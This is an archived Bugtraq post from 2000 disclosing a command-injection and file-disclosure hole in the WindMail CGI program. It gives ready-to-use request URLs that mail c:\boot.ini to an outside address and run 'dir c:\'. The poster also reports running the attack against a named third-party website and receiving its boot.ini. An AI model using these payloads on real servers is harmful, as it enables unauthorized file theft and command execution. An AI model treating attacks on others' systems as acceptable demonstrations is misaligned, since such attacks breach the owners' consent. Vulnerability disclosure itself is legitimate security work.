Bugtraq mailing list archives
Windmail allow web user get any file
From: frankie () CNNS NET (Frankie Zie)
Date: Sat, 25 Mar 2000 22:41:46 -0000
I found some vulnerabilities if windmail run as a CGI application.tested On WindowsNT 4.0, Windmail 3.05 successfully. WindMail is a 32-bit Windows console program by geocel that gives you command-line e-mail messaging capability. You can download an evaluation copy of WindMail 3.0 at: http://www.geocel.com/download/wmail301e.exe WindMail has a feature that allow Mail HTML form results from CGI scripts I found windmail doesn't check either attachment file or special character for parameters, that allow you execute arbitrary command which web user can do: http://xx.com/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini% 20yourmail () mail com%20|%20dir%20c:\ After the request, windmail will send c:\boot.ini to yourmail () mail com and execute "dir c:\" command. For example: http://www.metro.net/cgi-bin/windmail.exe?-n%20c:\boot.ini% 20chinahack () 163 net After a while, check chinahack () 163 net, i got a copy of boot.ini from www.metro.net pp () cnns net http://www.cnns.net
Current thread:
- Microsoft Security Bulletin (MS00-021), (continued)
- Microsoft Security Bulletin (MS00-021) Microsoft Product Security (Mar 30)
- Napster, Inc. response to Colten Edwards Elias Levy (Mar 30)
- Cobalt apache configuration exposes .htaccess Paul Schreiber (Mar 30)
- Re: Napster, Inc. response to Colten Edwards Danny Crawford (Mar 30)
- Re: Napster, Inc. response to Colten Edwards Dylan Griffiths (Mar 30)
- Alert: MS Index Server (CISADV000330) Cerberus Security Team (Mar 30)
- Webstar 4.0 Buffer overflow vulnerability Ilhom Djalilov (Mar 31)
- Microsoft Security Bulletin (MS00-006) Microsoft Product Security (Mar 31)
- [ Cobalt ] Security Advisory -- 03.31.2000 Jeff Lovell (Mar 31)
- SalesLogix Eviewer Web App Bug: URL request crashes eviewer web application Todd Beebe (Mar 31)
- Windmail allow web user get any file Frankie Zie (Mar 25)
- Re: Local Denial-of-Service attack against Linux Gigi Sullivan (Mar 26)
- Re: Local Denial-of-Service attack against Linux Gigi Sullivan (Mar 31)
- Re: gpm-root Alessandro Rubini (Mar 23)